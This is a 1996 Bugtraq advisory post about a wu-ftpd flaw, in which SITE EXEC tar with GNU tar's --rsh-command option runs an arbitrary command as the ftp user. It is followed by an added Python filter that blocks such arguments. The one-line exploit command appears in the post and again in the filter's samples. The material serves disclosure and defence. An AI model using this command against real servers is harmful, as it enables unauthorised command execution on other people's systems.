From proff  Tue Aug 20 10:06:30 1996
Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id KAA28528 for best-of-security; Tue, 20 Aug 1996 10:06:30 +1000
Received: from brimstone.netspace.org ([128.148.157.143]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id EAA15265 for <proff@SUBURBIA.NET>; Tue, 20 Aug 1996 04:47:11 +1000
Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <26306-16246>; Mon, 19 Aug 1996 14:45:17 -0500
Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id OAA10112; Mon, 19 Aug 1996 14:37:21 -0400
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with
          spool id 281902 for BUGTRAQ@NETSPACE.ORG; Mon, 19 Aug 1996 14:34:55
          -0400
Received: from netspace.org (netspace [128.148.157.6]) by netspace.org
          (8.7/8.6.12) with SMTP id OAA09102 for <BUGTRAQ@NETSPACE.ORG>; Mon,
          19 Aug 1996 14:29:47 -0400
Approved-By: ALEPH1@UNDERGROUND.ORG
Received: from pluto.private.cableol.net (pluto.cableol.net [194.168.50.1]) by
          netspace.org (8.7/8.6.12) with SMTP id JAA12010 for
          <bugtraq@netspace.org>; Mon, 19 Aug 1996 09:12:09 -0400
Received: from [10.144.1.245] by pluto.private.cableol.net;
          (5.65v3.2/1.1.8.2/19Mar96-0213PM) id AA16648; Mon, 19 Aug 1996
          14:11:51 +0100
Received: (from coxa@localhost) by cableol.net (8.7.4/8.7.3) id OAA18348 for
          bugtraq@netspace.org; Mon, 19 Aug 1996 14:09:19 +0100
Content-Type: text
Approved-By:  Alan Cox <coxa@CABLEOL.NET>
Message-ID: <199608191309.OAA18348@cableol.net>
Date: 	Mon, 19 Aug 1996 14:09:19 +0100
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
Sender: proff
From: Alan Cox <coxa@cableol.net>
Subject:      WU.FTPD vulnerability: gnu tar possibly others
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>

quote site exec tar  -c -v --rsh-command=commandtorunasftp -f somebox:foo foo

Gnu tar allows you to specify which binary you wish to run.

Fix:
        Use a dumber tar. Also carefully evaluate any other binaries
you have to avoid unpleasant and similar surprises.


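As an added defender-side illustration (not from the original post and not wu-ftpd code), the following Python filter applies the "dumber tar" idea to a SITE EXEC argument string before it reaches the binary: only a fixed set of tar flags and local operands are allowed, so option-driven program execution such as the --rsh-command case above is rejected. The hook point, the permitted flag set and the sample strings are assumptions.

```python
import shlex

# Assumption: the FTP server hands the SITE EXEC argument string to the binary
# named by its first word. Only archive/extract/list/verbose/archive-name flags
# are permitted; anything that could name a program or a remote host is not.
ALLOWED_TAR_SHORT_FLAGS = set("cxtvf")


def check_site_exec(line):
    """Return (ok, reason) for one SITE EXEC argument string.

    Rejects long options (e.g. --rsh-command), short flags outside the
    allow-list, `host:path` archive names, and paths outside the ftp tree.
    """
    try:
        argv = shlex.split(line)
    except ValueError as e:
        return False, "unparseable argument string: %s" % e
    if not argv:
        return False, "empty command"
    if argv[0] != "tar":
        return False, "binary not permitted: %s" % argv[0]

    args = argv[1:]
    # GNU tar also accepts old-style bundled flags with no dash ("tar cvf ...");
    # normalise that form so it is checked like "-cvf".
    if args and not args[0].startswith("-") and args[0].isalpha():
        args[0] = "-" + args[0]

    for arg in args:
        if arg.startswith("--"):
            return False, "long option not permitted: %s" % arg
        if arg.startswith("-"):
            bad = set(arg[1:]) - ALLOWED_TAR_SHORT_FLAGS
            if bad:
                return False, "flag(s) not permitted: %s" % "".join(sorted(bad))
        elif ":" in arg:
            return False, "remote archive name not permitted: %s" % arg
        elif arg.startswith("/") or ".." in arg.split("/"):
            return False, "path escapes ftp directory: %s" % arg
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample strings: the one from the post, and a benign request.
    for sample in ("tar -c -v --rsh-command=commandtorunasftp -f somebox:foo foo",
                   "tar -c -v -f foo.tar foo"):
        print(sample, "->", check_site_exec(sample))
```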